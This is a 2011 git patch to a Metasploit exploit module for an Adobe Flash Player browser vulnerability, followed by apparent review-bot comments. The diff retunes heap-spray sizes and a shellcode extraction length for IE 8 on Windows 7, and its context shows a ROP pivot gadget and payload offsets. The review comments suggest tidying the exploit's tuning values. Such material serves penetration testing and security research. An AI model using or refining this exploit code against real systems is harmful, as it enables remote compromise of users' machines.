From 2b3a2771247de6612014ff098b5be90d5d85b2f6 Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Tue, 27 Sep 2011 08:55:07 +0000
Subject: [PATCH] Found an instance that causes the win 7 target to fail. This fix corrects it.

git-svn-id: file:///home/svn/framework3/trunk@13797 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/windows/browser/adobe_flashplayer_flash10o.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
index 7222ebcb2d..b2a15b333f 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -109,8 +109,8 @@ class Metasploit3 < Msf::Exploit::Remote
 'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)
 'Offset1' => '0x5F4', #Offset for rop+payload
 'Offset2' => '0x02', #Offset to 0x11111110
- 'Max1' => '0x150', #First spray
- 'Max2' => '0x200' #Second spray
+ 'Max1' => '0x101', #First spray
+ 'Max2' => '0x300' #Second spray
 }
 ]
 ],
@@ -123,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
 OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
 ], self.class
 )
+
 end
 
 def exploit
@@ -232,7 +233,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 #Extract string based on target
 if my_target.name == 'IE 8 on Windows 7'
- js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
+ js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);"
 elsif my_target.name == 'IE 8 on Windows XP SP3'
 js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
 else
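Review bot: The retuned `'Max1'` and `'Max2'` entries in this target hash remain undocumented magic numbers: the trailing comments say only `#First spray` and `#Second spray`, and the commit message does not identify which configuration failed with the old values. A comment of the form `#First spray: <unit>, validated on <OS / browser / plugin build>` on each entry would let a later maintainer tell whether the numbers still apply. The values are also quoted hex strings while `'Pivot'` in the same hash is an Integer literal; presumably they are interpolated into generated JavaScript, and a short comment saying so would explain the difference. The target hash opens above the hunk.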
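Review bot: In the third hunk the branch is chosen by comparing `my_target.name` with the display string `'IE 8 on Windows 7'`, so renaming that target in the targets list would silently route it to the `else` branch. The size literal changed here also sits inside a JavaScript string, apart from the per-target `'Max1'`/`'Max2'` values edited in the first hunk, which splits one target's tuning across two places. Holding it as a key of the target hash, for example `'BlockSize' => '0x7ff00', #Size used by the substring() extraction` (an illustrative key name), and interpolating it would keep the values together and make the name comparison unnecessary. The `if`/`elsif` chain continues past the end of the hunk.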